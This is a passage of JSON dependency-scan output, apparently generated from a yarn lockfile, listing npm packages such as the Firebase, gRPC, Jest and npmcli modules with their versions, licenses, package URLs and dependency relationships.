"AnalyzedBy": "yarn" }, { "ID": "@firebase/firestore@4.9.1", "Name": "@firebase/firestore", "Identifier": { "PURL": "pkg:npm/%40firebase/firestore@4.9.1", "UID": "87c152ec81aab79d" }, "Version": "4.9.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "@firebase/webchannel-wrapper@1.0.4", "@grpc/grpc-js@1.9.15", "@grpc/proto-loader@0.7.15", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1353, "EndLine": 1364 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/firestore-compat@0.4.1", "Name": "@firebase/firestore-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/firestore-compat@0.4.1", "UID": "f5f9c89589beb09e" }, "Version": "0.4.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/firestore@4.9.1", "@firebase/firestore-types@3.0.3", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1337, "EndLine": 1346 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/firestore-types@3.0.3", "Name": "@firebase/firestore-types", "Identifier": { "PURL": "pkg:npm/%40firebase/firestore-types@3.0.3", "UID": "e4cd7693c05a7d1c" }, "Version": "3.0.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1348, "EndLine": 1351 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/functions@0.13.1", "Name": "@firebase/functions", "Identifier": { "PURL": "pkg:npm/%40firebase/functions@0.13.1", "UID": "29c096beb4832fcd" }, "Version": "0.13.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-interop-types@0.3.3", "@firebase/auth-interop-types@0.2.4", "@firebase/component@0.7.0", "@firebase/messaging-interop-types@0.2.3", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1382, "EndLine": 1392 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/functions-compat@0.4.1", "Name": "@firebase/functions-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/functions-compat@0.4.1", "UID": "77a657ad190eed47" }, "Version": "0.4.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/functions@0.13.1", "@firebase/functions-types@0.6.3", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1366, "EndLine": 1375 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/functions-types@0.6.3", "Name": "@firebase/functions-types", "Identifier": { "PURL": "pkg:npm/%40firebase/functions-types@0.6.3", "UID": "17e85ca15fc9a4dd" }, "Version": "0.6.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1377, "EndLine": 1380 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/installations@0.6.19", "Name": "@firebase/installations", "Identifier": { "PURL": "pkg:npm/%40firebase/installations@0.6.19", "UID": "8f48ae8acdcc7bef" }, "Version": "0.6.19", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/util@1.13.0", "idb@7.1.1", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1410, "EndLine": 1418 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/installations-compat@0.2.19", "Name": "@firebase/installations-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/installations-compat@0.2.19", "UID": "aa339cf7ea82505c" }, "Version": "0.2.19", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/installations-types@0.5.3", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1394, "EndLine": 1403 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/installations-types@0.5.3", "Name": "@firebase/installations-types", "Identifier": { "PURL": "pkg:npm/%40firebase/installations-types@0.5.3", "UID": "de4df51c6f471a77" }, "Version": "0.5.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1405, "EndLine": 1408 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/logger@0.5.0", "Name": "@firebase/logger", "Identifier": { "PURL": "pkg:npm/%40firebase/logger@0.5.0", "UID": "c40e3933870841c6" }, "Version": "0.5.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.8.1" ], "Locations": [ { "StartLine": 1420, "EndLine": 1425 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/messaging@0.12.23", "Name": "@firebase/messaging", "Identifier": { "PURL": "pkg:npm/%40firebase/messaging@0.12.23", "UID": "8af53a8dfcbc8e7d" }, "Version": "0.12.23", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/messaging-interop-types@0.2.3", "@firebase/util@1.13.0", "idb@7.1.1", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1442, "EndLine": 1452 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/messaging-compat@0.2.23", "Name": "@firebase/messaging-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/messaging-compat@0.2.23", "UID": "9b297c73c977d92c" }, "Version": "0.2.23", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/messaging@0.12.23", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1427, "EndLine": 1435 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/messaging-interop-types@0.2.3", "Name": "@firebase/messaging-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/messaging-interop-types@0.2.3", "UID": "41cdae44b1f8c9d3" }, "Version": "0.2.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1437, "EndLine": 1440 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/performance@0.7.9", "Name": "@firebase/performance", "Identifier": { "PURL": "pkg:npm/%40firebase/performance@0.7.9", "UID": "809fb7eab42e9843" }, "Version": "0.7.9", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1", "web-vitals@4.2.4" ], "Locations": [ { "StartLine": 1471, "EndLine": 1481 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/performance-compat@0.2.22", "Name": "@firebase/performance-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/performance-compat@0.2.22", "UID": "298d678ac0b0a98f" }, "Version": "0.2.22", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/performance@0.7.9", "@firebase/performance-types@0.2.3", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1454, "EndLine": 1464 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/performance-types@0.2.3", "Name": "@firebase/performance-types", "Identifier": { "PURL": "pkg:npm/%40firebase/performance-types@0.2.3", "UID": "9105ee439f6cd9c7" }, "Version": "0.2.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1466, "EndLine": 1469 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/remote-config@0.6.6", "Name": "@firebase/remote-config", "Identifier": { "PURL": "pkg:npm/%40firebase/remote-config@0.6.6", "UID": "b6edc39b6f049d94" }, "Version": "0.6.6", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1500, "EndLine": 1509 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/remote-config-compat@0.2.19", "Name": "@firebase/remote-config-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/remote-config-compat@0.2.19", "UID": "924e3ca5b327a151" }, "Version": "0.2.19", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/remote-config@0.6.6", "@firebase/remote-config-types@0.4.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1483, "EndLine": 1493 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/remote-config-types@0.4.0", "Name": "@firebase/remote-config-types", "Identifier": { "PURL": "pkg:npm/%40firebase/remote-config-types@0.4.0", "UID": "95229723b107f59b" }, "Version": "0.4.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1495, "EndLine": 1498 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/storage@0.14.0", "Name": "@firebase/storage", "Identifier": { "PURL": "pkg:npm/%40firebase/storage@0.14.0", "UID": "1a6810a62f691b2a" }, "Version": "0.14.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1527, "EndLine": 1534 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/storage-compat@0.4.0", "Name": "@firebase/storage-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/storage-compat@0.4.0", "UID": "214df88f029875ef" }, "Version": "0.4.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/storage@0.14.0", "@firebase/storage-types@0.8.3", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1511, "EndLine": 1520 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/storage-types@0.8.3", "Name": "@firebase/storage-types", "Identifier": { "PURL": "pkg:npm/%40firebase/storage-types@0.8.3", "UID": "b39ed7e3f364c431" }, "Version": "0.8.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1522, "EndLine": 1525 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/util@1.13.0", "Name": "@firebase/util", "Identifier": { "PURL": "pkg:npm/%40firebase/util@1.13.0", "UID": "71cea689cd874069" }, "Version": "1.13.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.8.1" ], "Locations": [ { "StartLine": 1536, "EndLine": 1541 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/webchannel-wrapper@1.0.4", "Name": "@firebase/webchannel-wrapper", "Identifier": { "PURL": "pkg:npm/%40firebase/webchannel-wrapper@1.0.4", "UID": "a76703bd2ecb36e2" }, "Version": "1.0.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1543, "EndLine": 1546 } ], "AnalyzedBy": "yarn" }, { "ID": "@grpc/grpc-js@1.9.15", "Name": "@grpc/grpc-js", "Identifier": { "PURL": "pkg:npm/%40grpc/grpc-js@1.9.15", "UID": "4a47e107b32349e3" }, "Version": "1.9.15", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@grpc/proto-loader@0.7.15", "@types/node@24.7.0" ], "Locations": [ { "StartLine": 1553, "EndLine": 1559 } ], "AnalyzedBy": "yarn" }, { "ID": "@grpc/proto-loader@0.7.15", "Name": "@grpc/proto-loader", "Identifier": { "PURL": "pkg:npm/%40grpc/proto-loader@0.7.15", "UID": "647b34b3f8243b8b" }, "Version": "0.7.15", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lodash.camelcase@4.3.0", "long@5.3.2", "protobufjs@7.5.4", "yargs@17.7.2" ], "Locations": [ { "StartLine": 1561, "EndLine": 1569 } ], "AnalyzedBy": "yarn" }, { "ID": "@isaacs/balanced-match@4.0.1", "Name": "@isaacs/balanced-match", "Identifier": { "PURL": "pkg:npm/%40isaacs/balanced-match@4.0.1", "UID": "e84a375658c5853a" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1602, "EndLine": 1603 } ], "AnalyzedBy": "yarn" }, { "ID": "@isaacs/brace-expansion@5.0.0", "Name": "@isaacs/brace-expansion", "Identifier": { "PURL": "pkg:npm/%40isaacs/brace-expansion@5.0.0", "UID": "885a889e7cdb5828" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/balanced-match@4.0.1" ], "Locations": [ { "StartLine": 1605, "EndLine": 1608 } ], "AnalyzedBy": "yarn" }, { "ID": "@isaacs/cliui@8.0.2", "Name": "@isaacs/cliui", "Identifier": { "PURL": "pkg:npm/%40isaacs/cliui@8.0.2", "UID": "d0da5818a82f98b8" }, "Version": "8.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@5.1.2", "string-width-cjs@4.2.3", "strip-ansi@7.1.2", "strip-ansi-cjs@6.0.1", "wrap-ansi@8.1.0", "wrap-ansi-cjs@7.0.0" ], "Locations": [ { "StartLine": 1610, "EndLine": 1620 } ], "AnalyzedBy": "yarn" }, { "ID": "@isaacs/fs-minipass@4.0.1", "Name": "@isaacs/fs-minipass", "Identifier": { "PURL": "pkg:npm/%40isaacs/fs-minipass@4.0.1", "UID": "9087080fa6e915d6" }, "Version": "4.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 1622, "EndLine": 1627 } ], "AnalyzedBy": "yarn" }, { "ID": "@isaacs/string-locale-compare@1.1.0", "Name": "@isaacs/string-locale-compare", "Identifier": { "PURL": "pkg:npm/%40isaacs/string-locale-compare@1.1.0", "UID": "559e22cc9cdf9aab" }, "Version": "1.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1629, "EndLine": 1632 } ], "AnalyzedBy": "yarn" }, { "ID": "@isaacs/ttlcache@1.4.1", "Name": "@isaacs/ttlcache", "Identifier": { "PURL": "pkg:npm/%40isaacs/ttlcache@1.4.1", "UID": "37ad6e4258d7c668" }, "Version": "1.4.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1634, "EndLine": 1637 } ], "AnalyzedBy": "yarn" }, { "ID": "@istanbuljs/load-nyc-config@1.1.0", "Name": "@istanbuljs/load-nyc-config", "Identifier": { "PURL": "pkg:npm/%40istanbuljs/load-nyc-config@1.1.0", "UID": "fb9cae5d4bcc4c60" }, "Version": "1.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase@5.3.1", "find-up@4.1.0", "get-package-type@0.1.0", "js-yaml@3.14.1", "resolve-from@5.0.0" ], "Locations": [ { "StartLine": 1639, "EndLine": 1648 } ], "AnalyzedBy": "yarn" }, { "ID": "@istanbuljs/schema@0.1.3", "Name": "@istanbuljs/schema", "Identifier": { "PURL": "pkg:npm/%40istanbuljs/schema@0.1.3", "UID": "94f85310633869ea" }, "Version": "0.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1650, "EndLine": 1653 } ], "AnalyzedBy": "yarn" }, { "ID": "@jest/create-cache-key-function@29.7.0", "Name": "@jest/create-cache-key-function", "Identifier": { "PURL": "pkg:npm/%40jest/create-cache-key-function@29.7.0", "UID": "c60cc21f5c888eeb" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3" ], "Locations": [ { "StartLine": 1701, "EndLine": 1706 } ], "AnalyzedBy": "yarn" }, { "ID": "@jest/environment@29.7.0", "Name": "@jest/environment", "Identifier": { "PURL": "pkg:npm/%40jest/environment@29.7.0", "UID": "dbe697a7fd2b9c00" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/fake-timers@29.7.0", "@jest/types@29.6.3", "@types/node@24.7.0", "jest-mock@29.7.0" ], "Locations": [ { "StartLine": 1708, "EndLine": 1716 } ], "AnalyzedBy": "yarn" }, { "ID": "@jest/fake-timers@29.7.0", "Name": "@jest/fake-timers", "Identifier": { "PURL": "pkg:npm/%40jest/fake-timers@29.7.0", "UID": "a9bb7d1b873a3b88" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "@sinonjs/fake-timers@10.3.0", "@types/node@24.7.0", "jest-message-util@29.7.0", "jest-mock@29.7.0", "jest-util@29.7.0" ], "Locations": [ { "StartLine": 1733, "EndLine": 1743 } ], "AnalyzedBy": "yarn" }, { "ID": "@jest/schemas@29.6.3", "Name": "@jest/schemas", "Identifier": { "PURL": "pkg:npm/%40jest/schemas@29.6.3", "UID": "efd92a17b357faae" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sinclair/typebox@0.27.8" ], "Locations": [ { "StartLine": 1785, "EndLine": 1790 } ], "AnalyzedBy": "yarn" }, { "ID": "@jest/transform@29.7.0", "Name": "@jest/transform", "Identifier": { "PURL": "pkg:npm/%40jest/transform@29.7.0", "UID": "d878b80bd72b46ec" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@jest/types@29.6.3", "@jridgewell/trace-mapping@0.3.31", "babel-plugin-istanbul@6.1.1", "chalk@4.1.2", "convert-source-map@2.0.0", "fast-json-stable-stringify@2.1.0", "graceful-fs@4.2.11", "jest-haste-map@29.7.0", "jest-regex-util@29.6.3", "jest-util@29.7.0", "micromatch@4.0.8", "pirates@4.0.7", "slash@3.0.0", "write-file-atomic@4.0.2" ], "Locations": [ { "StartLine": 1821, "EndLine": 1840 } ], "AnalyzedBy": "yarn" }, { "ID": "@jest/types@29.6.3", "Name": "@jest/types", "Identifier": { "PURL": "pkg:npm/%40jest/types@29.6.3", "UID": "c6671c97e6f5aa63" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/schemas@29.6.3", "@types/istanbul-lib-coverage@2.0.6", "@types/istanbul-reports@3.0.4", "@types/node@24.7.0", "@types/yargs@17.0.33", "chalk@4.1.2" ], "Locations": [ { "StartLine": 1842, "EndLine": 1852 } ], "AnalyzedBy": "yarn" }, { "ID": "@jridgewell/gen-mapping@0.3.13", "Name": "@jridgewell/gen-mapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", "UID": "9d240ac1cdc7f56a" }, "Version": "0.3.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/sourcemap-codec@1.5.5", "@jridgewell/trace-mapping@0.3.31" ], "Locations": [ { "StartLine": 1854, "EndLine": 1860 } ], "AnalyzedBy": "yarn" }, { "ID": "@jridgewell/remapping@2.3.5", "Name": "@jridgewell/remapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/remapping@2.3.5", "UID": "6e46742d6cafb5c6" }, "Version": "2.3.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/gen-mapping@0.3.13", "@jridgewell/trace-mapping@0.3.31" ], "Locations": [ { "StartLine": 1862, "EndLine": 1868 } ], "AnalyzedBy": "yarn" }, { "ID": "@jridgewell/resolve-uri@3.1.2", "Name": "@jridgewell/resolve-uri", "Identifier": { "PURL": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", "UID": "9f0830fe3d960fc0" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1870, "EndLine": 1873 } ], "AnalyzedBy": "yarn" }, { "ID": "@jridgewell/source-map@0.3.11", "Name": "@jridgewell/source-map", "Identifier": { "PURL": "pkg:npm/%40jridgewell/source-map@0.3.11", "UID": "30f5d012149d467" }, "Version": "0.3.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/gen-mapping@0.3.13", "@jridgewell/trace-mapping@0.3.31" ], "Locations": [ { "StartLine": 1875, "EndLine": 1881 } ], "AnalyzedBy": "yarn" }, { "ID": "@jridgewell/sourcemap-codec@1.5.5", "Name": "@jridgewell/sourcemap-codec", "Identifier": { "PURL": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", "UID": "511acf4f0aa6899d" }, "Version": "1.5.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1883, "EndLine": 1886 } ], "AnalyzedBy": "yarn" }, { "ID": "@jridgewell/trace-mapping@0.3.31", "Name": "@jridgewell/trace-mapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", "UID": "326670d0cece4ede" }, "Version": "0.3.31", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/resolve-uri@3.1.2", "@jridgewell/sourcemap-codec@1.5.5" ], "Locations": [ { "StartLine": 1888, "EndLine": 1894 } ], "AnalyzedBy": "yarn" }, { "ID": "@nodelib/fs.scandir@2.1.5", "Name": "@nodelib/fs.scandir", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.scandir@2.1.5", "UID": "dc8b4d9e69a7e2f4" }, "Version": "2.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.stat@2.0.5", "run-parallel@1.2.0" ], "Locations": [ { "StartLine": 1910, "EndLine": 1916 } ], "AnalyzedBy": "yarn" }, { "ID": "@nodelib/fs.stat@2.0.5", "Name": "@nodelib/fs.stat", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.stat@2.0.5", "UID": "b12e190f6eb8e426" }, "Version": "2.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1918, "EndLine": 1921 } ], "AnalyzedBy": "yarn" }, { "ID": "@nodelib/fs.walk@1.2.8", "Name": "@nodelib/fs.walk", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.walk@1.2.8", "UID": "e0cb370fc7462dcf" }, "Version": "1.2.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.scandir@2.1.5", "fastq@1.19.1" ], "Locations": [ { "StartLine": 1923, "EndLine": 1929 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/agent@3.0.0", "Name": "@npmcli/agent", "Identifier": { "PURL": "pkg:npm/%40npmcli/agent@3.0.0", "UID": "9dfda4468e29394f" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "http-proxy-agent@7.0.2", "https-proxy-agent@7.0.6", "lru-cache@10.4.3", "socks-proxy-agent@8.0.5" ], "Locations": [ { "StartLine": 1931, "EndLine": 1938 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/agent@4.0.0", "Name": "@npmcli/agent", "Identifier": { "PURL": "pkg:npm/%40npmcli/agent@4.0.0", "UID": "c6938f930b479c00" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "http-proxy-agent@7.0.2", "https-proxy-agent@7.0.6", "lru-cache@11.2.2", "socks-proxy-agent@8.0.5" ], "Locations": [ { "StartLine": 1940, "EndLine": 1949 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/arborist@9.1.6", "Name": "@npmcli/arborist", "Identifier": { "PURL": "pkg:npm/%40npmcli/arborist@9.1.6", "UID": "9f42207f7695de3f" }, "Version": "9.1.6", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/string-locale-compare@1.1.0", "@npmcli/fs@4.0.0", "@npmcli/installed-package-contents@3.0.0", "@npmcli/map-workspaces@5.0.0", "@npmcli/metavuln-calculator@9.0.2", "@npmcli/name-from-folder@3.0.0", "@npmcli/node-gyp@4.0.0", "@npmcli/package-json@7.0.1", "@npmcli/query@4.0.1", "@npmcli/redact@3.2.2", "@npmcli/run-script@10.0.0", "bin-links@5.0.0", "cacache@20.0.1", "common-ancestor-path@1.0.1", "hosted-git-info@9.0.2", "json-stringify-nice@1.1.4", "lru-cache@11.2.2", "minimatch@10.0.3", "nopt@8.1.0", "npm-install-checks@7.1.2", "npm-package-arg@13.0.1", "npm-pick-manifest@11.0.1", "npm-registry-fetch@19.0.0", "pacote@21.0.3", "parse-conflict-json@4.0.0", "proc-log@5.0.0", "proggy@3.0.0", "promise-all-reject-late@1.0.1", "promise-call-limit@3.0.2", "semver@7.7.3", "ssri@12.0.0", "treeverse@3.0.0", "walk-up-path@4.0.0" ], "Locations": [ { "StartLine": 1951, "EndLine": 1986 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/config@10.4.2", "Name": "@npmcli/config", "Identifier": { "PURL": "pkg:npm/%40npmcli/config@10.4.2", "UID": "11a350b99900872b" }, "Version": "10.4.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/map-workspaces@5.0.0", "@npmcli/package-json@7.0.1", "ci-info@4.3.1", "ini@5.0.0", "nopt@8.1.0", "proc-log@5.0.0", "semver@7.7.3", "walk-up-path@4.0.0" ], "Locations": [ { "StartLine": 1988, "EndLine": 1998 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/fs@4.0.0", "Name": "@npmcli/fs", "Identifier": { "PURL": "pkg:npm/%40npmcli/fs@4.0.0", "UID": "c851d3813a2615a0" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "semver@7.7.3" ], "Locations": [ { "StartLine": 2008, "EndLine": 2011 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/git@7.0.0", "Name": "@npmcli/git", "Identifier": { "PURL": "pkg:npm/%40npmcli/git@7.0.0", "UID": "265413e695b4e3b" }, "Version": "7.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/promise-spawn@8.0.3", "ini@5.0.0", "lru-cache@11.2.2", "npm-pick-manifest@11.0.1", "proc-log@5.0.0", "promise-retry@2.0.1", "semver@7.7.3", "which@5.0.0" ], "Locations": [ { "StartLine": 2013, "EndLine": 2023 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/installed-package-contents@3.0.0", "Name": "@npmcli/installed-package-contents", "Identifier": { "PURL": "pkg:npm/%40npmcli/installed-package-contents@3.0.0", "UID": "1976761e233f4d85" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-bundled@4.0.0", "npm-normalize-package-bin@4.0.0" ], "Locations": [ { "StartLine": 2025, "EndLine": 2029 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/map-workspaces@5.0.0", "Name": "@npmcli/map-workspaces", "Identifier": { "PURL": "pkg:npm/%40npmcli/map-workspaces@5.0.0", "UID": "5d5c917f27063e86" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/name-from-folder@3.0.0", "@npmcli/package-json@7.0.1", "glob@11.0.3", "minimatch@10.0.3" ], "Locations": [ { "StartLine": 2031, "EndLine": 2037 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/metavuln-calculator@9.0.2", "Name": "@npmcli/metavuln-calculator", "Identifier": { "PURL": "pkg:npm/%40npmcli/metavuln-calculator@9.0.2", "UID": "97bc19f74714b1ab" }, "Version": "9.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cacache@20.0.1", "json-parse-even-better-errors@4.0.0", "pacote@21.0.3", "proc-log@5.0.0", "semver@7.7.3" ], "Locations": [ { "StartLine": 2039, "EndLine": 2046 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/name-from-folder@3.0.0", "Name": "@npmcli/name-from-folder", "Identifier": { "PURL": "pkg:npm/%40npmcli/name-from-folder@3.0.0", "UID": "342433ad51eb6211" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2056, "EndLine": 2057 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/node-gyp@4.0.0", "Name": "@npmcli/node-gyp", "Identifier": { "PURL": "pkg:npm/%40npmcli/node-gyp@4.0.0", "UID": "1280873c56cca8c" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2059, "EndLine": 2060 } ], "AnalyzedBy": "yarn" }, { "ID": 